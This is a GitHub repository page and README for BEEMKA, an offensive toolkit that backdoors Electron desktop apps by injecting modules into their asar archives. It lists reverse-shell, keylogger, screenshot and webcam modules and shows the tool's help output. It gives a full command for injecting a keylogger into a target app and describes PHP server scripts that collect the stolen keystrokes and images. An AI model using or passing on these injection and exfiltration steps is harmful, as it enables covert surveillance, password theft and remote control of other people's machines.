Basic Electron Exploitation
Branch: master
Clone or download
Latest commit a505620 Jan 30, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
classes Hello World! Jan 24, 2019
modules Hello World! Jan 24, 2019
server Hello World! Jan 24, 2019
.gitignore Hello World! Jan 24, 2019
LICENSE
README.md add videos to readme Jan 30, 2019
beemka.py
requirements.txt Hello World! Jan 24, 2019

README.md

BEEMKA

Electron Exploitation Toolkit

Demo Videos (YouTube)

Bitwarden Password Egress

Bitwarden Password Egress

Skype Reverse Shell (Linux)

Skype Reverse Shell

Slack Desktop Screenshots

Slack Desktop Screenshots

VS Code WebCamera

Slack Desktop Screenshots

Requirements

  • Python 3.5+
  • jsmin

Installation

pip3 install -r requirements.txt

Modules

python3 beemka.py --list

Available modules

[ rshell_cmd ]          Windows Reverse Shell
[ rshell_linux ]        Linux Reverse Shell
[ screenshot ]          Screenshot Module
[ rshell_powershell ]   PowerShell Reverse Shell
[ keylogger ]           Keylogger Module
[ webcamera ]           WebCamera Module

Features:

usage: Beemka Electron Exploitation [-h] [-v] [-l] [-i] [-f ASAR_FILE]
                                    [-p ASAR_WORKING_PATH] [-o OUTPUT_FILE]
                                    [-m MODULE] [-u] [-z]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list-modules    List all available modules.
  -i, --inject          Inject code into Electron.
  -f ASAR_FILE, --asar ASAR_FILE
                        Path to electron.asar file.
  -p ASAR_WORKING_PATH, --asar-working-path ASAR_WORKING_PATH
                        Temporary working path to use for extracting asar
                        archives.
  -o OUTPUT_FILE, --output OUTPUT_FILE
                        Path to the file that will be generated.
  -m MODULE, --module MODULE
                        Module to inject. Use --list-modules to list available
                        modules.
  -u, --unpack          Unpack asar file.
  -z, --pack            Pack asar file.

Injecting a module into an application:

python3 beemka.py --inject --module keylogger --asar "PATH_TO_ELECTRON.ASAR" --output "SAVE_AS_ASAR"

Exfiltration helpers

Under the ./server directory there are the following files:

text.php

This file can be used to receive data sent by the keylogger module.

Before using it, make sure you update the "$storage" parameter at the beginning of the file.

image.php

This file can be used to receive data sent by the webcamera and screenshot modules.

Before using it, make sure you update the "$storage" parameter at the beginning of the file.

Credits

Leonardo Vieira for his asar.py class